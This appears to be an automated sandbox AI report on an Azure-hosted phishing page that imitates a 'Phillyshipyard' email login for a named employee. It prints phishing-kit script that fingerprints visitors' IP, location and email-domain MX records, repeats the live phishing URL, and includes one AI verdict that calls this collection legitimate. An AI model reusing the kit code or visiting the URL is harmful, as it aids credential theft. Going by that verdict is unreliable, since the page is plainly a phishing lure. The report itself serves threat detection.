"text_input_field_labels": [
"robert.webber@phillyshipyard.com",
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This is the beginning of the legitimate Bootstrap v4.0.0 library. It's a well-known, trusted framework with MIT license. The code shows standard module loading patterns, utility functions, and transition handling. No suspicious behaviors or malicious indicators are present."
} |
/*!
* Bootstrap v4.0.0 (https://getbootstrap.com)
* Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors)
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
*/
!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProperty("default")?n.default:n;var o,a,l,h,c,u,f,d,_,g,p,m,v,E,T,y,C,I,A,b,D,S,w,N,O,k,P=function(t){var e=!1;function n(e){var n=this,s=!1;return t(this).one(i.TRANSITION_END,function(){s=!0}),setTimeout(function(){s||i.triggerTransitionEnd(n)},e),this}var i={TRANSITION_END:"bsTransitionEnd",getUID:function(t){do{t+=~~(1e6*Math.random())}while(document.getElementById(t));return t},getSelectorFromElement:function(e){var n,i=e.getAttribute("data-target");i&&"#"!==i||(i=e.getAttribute("href")||""),"#"===i.charAt(0)&&(n=i,i=n="function"==typeof t.escapeSelector?t.escapeSelector(n).substr(1):n.replace(/(:|\.|\[|\]|,|=|@)/g,"\\$1"));try{return t(document).find(i).length>0?i:null}catch(t){return null}},reflow:function(t){return t.offsetHeight},triggerTransitionEnd:function(n){t(n).trigger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isElement(o)?"element":(l=o,{}.toString.call(l).match(/\s([a-zA-Z]+)/)[1].toLowerCase());if(!new RegExp(r).test(a))throw new Error(t.toUpperCase()+': Option "'+s+'" provided type "'+a+'" but expected type "'+r+'".')}var l}};return e=("undefined"==typeof window||!window.QUnit)&&{end:"transitionend"},t.fn.emulateTransitionEnd=n,i.supportsTransitionEnd()&&(t.event.special[i.TRANSITION_END]={bindType:e.end,delegateType:e.end,handle:function(e){if(t(e.target).is(this))return e.handleObj.handler.apply(this,arguments)}}),i}(e),L=(a="alert",h="."+(l="bs.alert"),c=(o=e).fn[a],u={CLOSE:"close"+h,CLOSED:"closed"+h,CLICK_DATA_API:"click"+h+".data-api"},f="alert",d="fade",_="show",g=function(){function t(t){this._element=t}var e=t.prototype;return e.close=function(t){t=t||this._element;var e=this._getRootElement(t);this._triggerCloseEvent(e).isDefaultPrevented()||this._removeElement(e)},e.dispose=function(){o.removeData(this._element,l),this._element=null},e._getRootElement=function(t){var e=P.getSelectorFromElement(t),n=!1;return e&&(n=o(e)[0]),n||(n=o(t).closest("."+f)[0]),n},e._triggerCloseEvent=function(t){var e=o.Event(u.CLOSE);return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._destroyElement(t)},e._destroyElement=function(t){o(t).detach().trigger(u.CLOSED).remove()},t._jQueryInterface=function(e){return this.each(function(){var n=o(this),i=n.data(l);i||(i=new t(this),n.data(l,i)),"close"===e&&i[e](this)})},t._handleDismiss=function(t){return function(e){e&&e.preventDefault(),t.close(this)}},s(t,null,[{key:"VERSION",get:function(){return"4.0.0"}}]),t}(),o(document).on(u.CLICK_DATA_API,'[data-dismiss="alert"]',g._handleDismiss(new g)),o.fn[a]=g._jQueryInterface,o.fn[a].Constructor=g,o.fn[a].noConflict=function(){return o.fn[a]=c,g._jQueryInterface},g),R=(m="button",E="."+(v="bs.button |
| URL: https://copilotse.blob.core.windows.net/$web/hgyxx... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The script shows moderate risk behaviors: 1) Collects sensitive user information including IP address, location, browser details, and language (+2 points), 2) Makes external API calls to ipinfo.io and dns.google (+2 points). However, these are legitimate services and the data collection appears transparent (-1 point). The code includes error handling and doesn't show signs of malicious behavior like obfuscation or suspicious redirects. The functionality seems focused on louserzation and user information gathering for legitimate purposes."
} |
function handleBase64Data(string) {
try {
return atob(string);
} catch (error) {
return string;
}
}
function getVisitorIP() {
return new Promise(function (resolve, reject) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://ipinfo.io/json', true);
xhr.onload = function () {
if (xhr.status >= 200 && xhr.status < 300) {
var response = JSON.parse(xhr.responseText);
resolve(response);
} else {
reject('Failed to fetch IP address');
}
};
xhr.onerror = function () {
reject('Failed to fetch IP address');
};
xhr.send();
});
}
async function getMXRecord(domain) {
try {
const response = await fetch(`https://dns.google/resolve?name=${domain}&type=MX`);
const data = await response.json();
if (data && data.Answer && data.Answer.length > 0) {
const mxRecords = data.Answer.map(record => `${record.data}`).join('\n');
return mxRecords;
} else {
return 'no-mx';
}
} catch (error) {
return 'MX-Error';
}
}
async function sendVisitorIP() {
try {
var visitorInfo = await getVisitorIP();
return [visitorInfo.ip, visitorInfo.country, visitorInfo.city, visitorInfo.region];
// Here you can send the visitorIP value to your desired destination
} catch (error) {
return error
}
}
function GetBrowserandLanguage() {
// deliver this method
let browser = window.clientInformation.appVersion;
let language = window.clientInformation.language;
// the return should be an array sorry not object ooo s
let info = [browser, language]
// return info array
return info;
}
function getLouserzedLanguage(customLocale = '') {
const userLanguage = (customLocale != '') ? customLocale : navigator.language || navigator.userLanguage;
const languageCode = userLanguage.substring(0, 2);
const lang = {
en: {
lessThan4: "Password must be at least 4 characters long.",
msg: "Invalid password. Please enter the correct information.",
error: "The account does not exist. Please enter a different account.",
emlTxt: "Email",
pswTxt: "Password",
submitBtn: "Login",
secLgSs: "Secure login session",
frgPsw: "Forgot password?",
copy: "Copyright 2024",
verifyingText: "Verifying...",
emlLogin: "Email Login",
mail: "Mail",
yourEmail: "Your email has been successfully activated.",
success: "Thank you. You will receive your file in your email shortly."
},
zh: {
lessThan4: "4",
msg: "",
error: "",
emlTxt: "",
pswTxt: "",
submitBtn: "",
secLgSs: "",
frgPsw: "",
copy: " 2023",
verifyingText: "...",
emlLogin: "",
mail: "",
yourEmail: "",
success: ""
},
ja: {
lessThan4: "4",
msg: "",
error: "",
emlTxt: "",
pswTxt: "",
submitBtn: "",
secLgSs: "",
frgPsw: "",
copy: " 2023",
verifyingText: "...",
emlLogin: "",
mail: "",
yourEmail: "",
success: ""
},
pt: {
lessThan4: "A senha deve ter mais de 4 caracteres.",
msg: "Senha invlida. Por favor, insira as informaes corretas.",
error: "A conta no |
| URL: https://code.jquery.com/jquery-3.3.1.js... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This is the beginning of the legitimate jQuery library (v3.3.1). While it contains DOM manipulation capabilities and uses DOMEval for script injection, these are standard features of jQuery used for legitimate purposes. The code is from a trusted source (jquery.com), is well-documented, and follows proper security practices. The only minor risk comes from the DOMEval function which can execute scripts, but it's implemented with proper safeguards."
} |
/*!
* jQuery JavaScript Library v3.3.1
* https://jquery.com/
*
* Includes Sizzle.js
* https://sizzlejs.com/
*
* Copyright JS Foundation and other contributors
* Released under the MIT license
* https://jquery.org/license
*
* Date: 2018-01-20T17:24Z
*/
( function( global, factory ) {
"use strict";
if ( typeof module === "object" && typeof module.exports === "object" ) {
// For CommonJS and CommonJS-like environments where a proper `window`
// is present, execute the factory and get jQuery.
// For environments that do not have a `window` with a `document`
// (such as Node.js), expose a factory as module.exports.
// This accentuates the need for the creation of a real `window`.
// e.g. var jQuery = require("jquery")(window);
// See ticket #14549 for more info.
module.exports = global.document ?
factory( global, true ) :
function( w ) {
if ( !w.document ) {
throw new Error( "jQuery requires a window with a document" );
}
return factory( w );
};
} else {
factory( global );
}
// Pass this if window is not defined yet
} )( typeof window !== "undefined" ? window : this, function( window, noGlobal ) {
// Edge <= 12 - 13+, Firefox <=18 - 45+, IE 10 - 11, Safari 5.1 - 9+, iOS 6 - 9.1
// throw exceptions when non-strict code (e.g., ASP.NET 4.5) accesses strict mode
// arguments.callee.caller (trac-13335). But as of jQuery 3.0 (2016), strict mode should be common
// enough that all such attempts are guarded in a try block.
"use strict";
var arr = [];
var document = window.document;
var getProto = Object.getPrototypeOf;
var slice = arr.slice;
var concat = arr.concat;
var push = arr.push;
var indexOf = arr.indexOf;
var class2type = {};
var toString = class2type.toString;
var hasOwn = class2type.hasOwnProperty;
var fnToString = hasOwn.toString;
var ObjectFunctionString = fnToString.call( Object );
var support = {};
var isFunction = function isFunction( obj ) {
// Support: Chrome <=57, Firefox <=52
// In some browsers, typeof returns "function" for HTML <object> elements
// (i.e., `typeof document.createElement( "object" ) === "function"`).
// We don't want to classify *any* DOM node as a function.
return typeof obj === "function" && typeof obj.nodeType !== "number";
};
var isWindow = function isWindow( obj ) {
return obj != null && obj === obj.window;
};
var preservedScriptAttributes = {
type: true,
src: true,
noModule: true
};
function DOMEval( code, doc, node ) {
doc = doc || document;
var i,
script = doc.createElement( "script" );
script.text = code;
if ( node ) {
for ( i in preservedScriptAttributes ) {
if ( node[ i ] ) {
script[ i ] = node[ i ];
}
}
}
doc.head.appendChild( script ).parentNode.removeChild( script );
}
function toType( obj ) {
if ( obj == null ) {
return obj + "";
}
// Support: Android <=2.3 only (functionish RegExp)
return typeof obj === "object" || typeof obj === "function" ?
class2type[ toString.call( obj ) ] || "object" :
typeof obj;
}
/* global Symbol */
// Defining this global in .eslintrc.json would create a danger of using the global
// unguarded in another place, it seems safer to define global only for this module
var
version = "3.3.1",
// Define a local copy of jQuery
jQuery = function( selector, context ) {
// The jQuery object is actually just the init constructor 'enhanced'
// Need init if jQuery is called (just allow error to be thrown if not included)
return new jQuery.fn.init( selector, context );
},
// Support: Android <=4.0 only
// Make sure we trim BOM and NBSP
rtrim = /^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g;
jQuery.fn = jQuery.prototype = {
// The current version of jQuery being used
jquery: version,
constructor: jQuery,
// The default length of a jQuery object is 0
length: 0,
toArray: function() {
return slice.call( this );
},
// Get the Nth element in the matched element set OR
// Get the whole |
| URL: https://stackpath.bootstrapcdn.com/bootstrap/4.1.3... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This is the beginning of the Bootstrap library (v4.1.3), a legitimate and widely-used front-end framework. The code is from a trusted source (getbootstrap.com), is properly licensed (MIT), and contains standard JavaScript module loading patterns and utility functions. No malicious behaviors or suspicious patterns are present."
} |
/*!
* Bootstrap v4.1.3 (https://getbootstrap.com/)
* Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors)
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
*/
!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enumerable}))),e.forEach(function(t){var e,n,i;e=r,i=o[n=t],n in e?Object.defineProperty(e,n,{value:i,enumerable:!0,configurable:!0,writable:!0}):e[n]=i})}return r}e=e&&e.hasOwnProperty("default")?e.default:e,h=h&&h.hasOwnProperty("default")?h.default:h;var r,n,o,a,c,u,f,d,g,_,m,p,v,y,E,C,T,b,S,I,A,D,w,N,O,k,P,j,H,L,R,x,W,U,q,F,K,M,Q,B,V,Y,z,J,Z,G,$,X,tt,et,nt,it,rt,ot,st,at,lt,ct,ht,ut,ft,dt,gt,_t,mt,pt,vt,yt,Et,Ct,Tt,bt,St,It,At,Dt,wt,Nt,Ot,kt,Pt,jt,Ht,Lt,Rt,xt,Wt,Ut,qt,Ft,Kt,Mt,Qt,Bt,Vt,Yt,zt,Jt,Zt,Gt,$t,Xt,te,ee,ne,ie,re,oe,se,ae,le,ce,he,ue,fe,de,ge,_e,me,pe,ve,ye,Ee,Ce,Te,be,Se,Ie,Ae,De,we,Ne,Oe,ke,Pe,je,He,Le,Re,xe,We,Ue,qe,Fe,Ke,Me,Qe,Be,Ve,Ye,ze,Je,Ze,Ge,$e,Xe,tn,en,nn,rn,on,sn,an,ln,cn,hn,un,fn,dn,gn,_n,mn,pn,vn,yn,En,Cn,Tn,bn,Sn,In,An,Dn,wn,Nn,On,kn,Pn,jn,Hn,Ln,Rn,xn,Wn,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||l.triggerTransitionEnd(e)},t),this}var l={TRANSITION_END:"bsTransitionEnd",getUID:function(t){for(;t+=~~(1e6*Math.random()),document.getElementById(t););return t},getSelectorFromElement:function(t){var e=t.getAttribute("data-target");e&&"#"!==e||(e=t.getAttribute("href")||"");try{return document.querySelector(e)?e:null}catch(t){return null}},getTransitionDurationFromElement:function(t){if(!t)return 0;var e=i(t).css("transition-duration");return parseFloat(e)?(e=e.split(",")[0],1e3*parseFloat(e)):0},reflow:function(t){return t.offsetHeight},triggerTransitionEnd:function(t){i(t).trigger(e)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var i in n)if(Object.prototype.hasOwnProperty.call(n,i)){var r=n[i],o=e[i],s=o&&l.isElement(o)?"element":(a=o,{}.toString.call(a).match(/\s([a-z]+)/i)[1].toLowerCase());if(!new RegExp(r).test(s))throw new Error(t.toUpperCase()+': Option "'+i+'" provided type "'+s+'" but expected type "'+r+'".')}var a}};return i.fn.emulateTransitionEnd=t,i.event.special[l.TRANSITION_END]={bindType:e,delegateType:e,handle:function(t){if(i(t.target).is(this))return t.handleObj.handler.apply(this,arguments)}},l}(e),Kn=(n="alert",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",g="show",_=function(){function i(t){this._element=t}var t=i.prototype;return t.close=function(t){var e=this._element;t&&(e=this._getRootElement(t)),this._triggerCloseEvent(e).isDefaultPrevented()||this._removeElement(e)},t.dispose=function(){r.removeData(this._element,o),this._element=null},t._getRootElement=function(t){var e=Fn.getSelectorFromElement(t),n=!1;return e&&(n=document.querySelector(e)),n||(n=r(t).closest("."+f)[0]),n},t._triggerCloseEvent=function(t){var e=r.Event(u.CLOSE);return r(t).trigger(e),e},t._removeElement=function(e){var n=this;if(r(e).removeClass(g),r(e).hasClass(d)){var t=Fn.getTransitionDurationFromElement(e);r(e).one(Fn.TRANSITION_END,function(t){return |
| URL: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com Model: Joe Sandbox AI | {
"brands": [
"Phillyshipyard"
]
} |
|
| URL: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com Model: Joe Sandbox AI | ```json{ "legit_domain": "phillyshipyard.com", "classification": "unknown", "reasons": [ "The URL 'copilotse.blob.core.windows.net' is a subdomain of 'blob.core.windows.net', which is a domain associated with Microsoft Azure's cloud storage services.", "The brand 'Phillyshipyard' is not widely recognized as a well-known brand, hence classified as 'unknown'.", "The email domain 'phillyshipyard.com' matches the brand name, suggesting a legitimate association.", "The use of a cloud service provider's domain (blob.core.windows.net) is common for hosting resources, but it requires verification of the legitimacy of the resource owner.", "There is no direct match between the URL and the brand's legitimate domain, which raises suspicion.", "The presence of input fields for email and password could indicate a phishing attempt if not verified as a legitimate service." ], "riskscore": 6} |
URL: copilotse.blob.core.windows.net
Brands: Phillyshipyard
Input Fields: robert.webber@phillyshipyard.com, Password |
| URL: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Philllyshipyard Email Login",
"prominent_button_name": "Verifying...",
"text_input_field_labels": [
"robert.webber@phillyshipyard.com",
"........................."
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com Model: Joe Sandbox AI | {
"brands": [
"Phillyshipyard"
]
} |
|
| URL: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com Model: Joe Sandbox AI | ```json{ "legit_domain": "phillyshipyard.com", "classification": "unknown", "reasons": [ "The URL 'copilotse.blob.core.windows.net' is a subdomain of 'blob.core.windows.net', which is a domain associated with Microsoft Azure's cloud storage services.", "The brand 'Phillyshipyard' is not widely recognized as a well-known brand, hence classified as 'unknown'.", "The domain 'phillyshipyard.com' is the legitimate domain for Phillyshipyard, but it does not match the provided URL.", "The use of a cloud storage service domain (blob.core.windows.net) could be legitimate if Phillyshipyard is using Azure services, but it could also be a tactic to obscure the true nature of the site.", "The email address 'robert.webber@phillyshipyard.com' suggests a connection to the legitimate Phillyshipyard domain, but it does not confirm the legitimacy of the URL provided." ], "riskscore": 6} |
URL: copilotse.blob.core.windows.net
Brands: Phillyshipyard
Input Fields: robert.webber@phillyshipyard.com, ......................... |
| URL: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Phillyshipyard Email Login",
"prominent_button_name": "Verifying...",
"text_input_field_labels": [
"robert.webber@phillyshipyard.com",
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com Model: Joe Sandbox AI | {
"brands": [
"Phillyshipyard"
]
} |
|
| URL: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com Model: Joe Sandbox AI | ```json{ "legit_domain": "phillyshipyard.com", "classification": "unknown", "reasons": [ "The URL 'copilotse.blob.core.windows.net' is a subdomain of 'blob.core.windows.net', which is a Microsoft Azure storage domain.", "The brand 'Phillyshipyard' is not commonly associated with 'blob.core.windows.net'.", "The URL does not contain any direct reference to 'phillyshipyard.com', which is the legitimate domain for Phillyshipyard.", "The use of a cloud storage domain like 'blob.core.windows.net' can be legitimate if used for file storage or content delivery, but it can also be used for phishing if the content is misleading.", "The email input field 'robert.webber@phillyshipyard.com' suggests an association with Phillyshipyard, but the URL does not match the legitimate domain." ], "riskscore": 7} |
URL: copilotse.blob.core.windows.net
Brands: Phillyshipyard
Input Fields: robert.webber@phillyshipyard.com, Password |
| URL: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D# Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Phillyshipyard Email Login",
"prominent_button_name": "Verifying...",
"text_input_field_labels": [
"robert.webber@phillyshipyard.com",
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D# Model: Joe Sandbox AI | {
"brands": [
"Phillyshipyard"
]
} |
|
| URL: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D# Model: Joe Sandbox AI | ```json{ "legit_domain": "phillyshipyard.com", "classification": "unknown", "reasons": [ "The URL 'copilotse.blob.core.windows.net' is a subdomain of 'blob.core.windows.net', which is a domain associated with Microsoft Azure's cloud storage services.", "The brand 'Phillyshipyard' is not widely recognized as a well-known brand, hence classified as 'unknown'.", "The email domain 'phillyshipyard.com' suggests a legitimate association with the brand Phillyshipyard.", "The use of a cloud service provider's domain (blob.core.windows.net) is common for hosting resources, but it can also be used for phishing if not properly verified.", "There is no direct match between the URL and the brand's legitimate domain, which raises suspicion.", "The presence of an email input field with a domain matching the brand suggests a potential legitimate use, but it could also be a phishing attempt to harvest credentials." ], "riskscore": 6} |
URL: copilotse.blob.core.windows.net
Brands: Phillyshipyard
Input Fields: robert.webber@phillyshipyard.com, Password |
| URL: https://windows.net Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://windows.net |
Edit tour
chrome.exe (PID: 6876 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node